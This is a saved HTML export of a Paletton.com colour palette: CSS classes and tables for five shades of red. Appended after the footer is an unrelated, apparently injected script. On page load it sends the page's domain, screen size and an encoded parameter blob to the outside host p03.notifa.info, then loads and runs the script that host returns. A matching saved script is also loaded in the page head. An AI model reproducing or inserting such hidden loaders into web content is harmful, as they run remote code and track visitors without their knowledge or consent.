<!DOCTYPE html>
<!-- saved from url=(0036)http://paletton.com/export/index.php -->
<html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
	
	<title>Color palette by Paletton.com</title>
	<meta name="generator" content="Paletton.com">

<style type="text/css">

/* Palette color codes */
/* Feel free to copy&paste color codes to your application */

.primary-1 { background-color: #D5C1C1 }
.primary-2 { background-color: #A55050 }
.primary-0 { background-color: #9A0606 }
.primary-3 { background-color: #750000 }
.primary-4 { background-color: #000000 }

/* end */


body {
	margin:0; padding: 2em;
	background: #fff;
	color: #000;
	font: 12px/1.33 "Segoe UI", "Helvetica Neue", Helvetica, sans-serif;
	text-align:left;
	}
h1 {
	margin: 0.5em 0;
	font-size: 200%;
	}
p {
	margin: 0.5em 0;
	}

.color-table {
	margin: 2em 2em 5em;
	border-collapse:collapse;
	border:none;
	border-spacing:0;
	font-size:100%;
	}
.color-table th {
	padding: 0 1em 0 0;
	text-align: right;
	vertical-align: middle;
	font-size: 100%;
	font-weight: normal;
	border: none;
	}
.color-table td.sample {
	width:6em; height:6em;
	padding: 10px;
	text-align:center;
	vertical-align:middle;
	font-size:90%;
	border: 1px solid white;
	white-space:nowrap;
	}
.color-table td.sample-0 {
	width:18em;
	}
.color-table.small td.sample {
	width:3em; height:3em;
	padding:0;
	border:none;
	}
.color-table.small td.sample-0 {
	width:9em;
	}
.color-table .white { margin-bottom:0.2em; color:white }
.color-table .black { margin-top:0.2em; color:black }

hr {
	margin: 2em 0 1em 0;
	border:none;
	border-bottom:1px solid silver;
	}
#footer {
	padding:1em;
	text-align:center;
	font-size:80%;
	}

</style>

<script type="text/javascript" async="" src="./Color Pallete_files/request"></script></head>
<body>

<h1>Color Palette by Paletton.com</h1>
<p>Palette URL: <a href="http://paletton.com/#uid=1000u0kuLjl2+qLgokHSweJ++00">http://paletton.com/#uid=1000u0kuLjl2+qLgokHSweJ++00</a></p>

<table class="color-table">
	<tbody><tr>
		<th>Primary color:</th>
		<td class="sample sample-1 primary-1">
			<div class="white">#D5C1C1</div>
			<div class="black">#D5C1C1</div>
		</td>
		<td class="sample sample-2 primary-2">
			<div class="white">#A55050</div>
			<div class="black">#A55050</div>
		</td>
		<td class="sample sample-0 primary-0">
			<div class="white">#9A0606</div>
			<div class="black">#9A0606</div>
		</td>
		<td class="sample sample-3 primary-3">
			<div class="white">#750000</div>
			<div class="black">#750000</div>
		</td>
		<td class="sample sample-4 primary-4">
			<div class="white">#000000</div>
			<div class="black">#000000</div>
		</td>
	</tr>
</tbody></table>

<table class="color-table small">
	<tbody><tr>
		<th>Primary color:</th>
		<td class="sample sample-1 primary-1"></td>
		<td class="sample sample-2 primary-2"></td>
		<td class="sample sample-0 primary-0"></td>
		<td class="sample sample-3 primary-3"></td>
		<td class="sample sample-4 primary-4"></td>
	</tr>
</tbody></table>

<p>
See the HTML source for more details.<br>
Use the <em>Save / Save As...</em> command in your browser to store the document for latter use.
</p>

<hr>

<p id="footer">Generated by <a href="http://paletton.com/">Paletton.com</a> © 2002-2014</p>

<script type="text/javascript">if (self==top) {function netbro_cache_analytics(fn, callback) {setTimeout(function() {fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r = Math.floor(Math.random()*99999999999);var url = idc_glo_url+ "p03.notifa.info/3fsmd3/request" + "?id=1" + "&enc=9UwkxLgY9" + "&params=" + "4TtHaUQnUEiP6K%2fc5C582PbDUVNc7V%2bdyHIzfwGphx2cX04B5CgPueB3nKBKrjMKuJKEqfCM7UQ2tQS2q5QzQKJOMAeZDm99BaVbqZhADbRfNOJ9i5iS9XT9mEZ%2fqFzr8hEFSq2vigJMgW4sEx3u13kBJXWF2Rttwuf%2ba61S5Jh3JI1FSNMtPpKP2t34FrigARj2s6NadTLw%2f8yaaUkYDcYuwOjdpC%2fTAiX9lsyrECihPONBEgss%2f0peBmjs3TOJwzDhlHeSY61XX4IY5LDFKZIGFff%2fpTIDlzGjqE0v1Z6Husr2745LbcXKOBJle1rOIAivJ%2bSrAs91a3kW5AXHImfh8XEZATcqGs488YbniDx27cYA82Bwg9hIXEjvSTqVwv6HQee5G0JWD3j9G3c0YkefO73XeGF8vn%2bR8NVH0zAv2SD4x0ABvPhyhG06Uy2TLqj1PAV7XvrvkizKeWO%2bQ51KsFW0vAbaEy8f4Jy6CFCAaviGChNwx0KTTRqPotWBWusvb7EBHidI%2fJikG1dhWogIMKQi7d0wjGLgjo2th7qIvFZObAF0V5AZcqQd%2bINXgtSWmLkEDO8%3d" + "&idc_r="+idc_glo_r + "&domain="+document.domain + "&sw="+screen.width+"&sh="+screen.height;var bsa = document.createElement('script');bsa.type = 'text/javascript';bsa.async = true;bsa.src = url;(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function(){});};</script>

</body></html>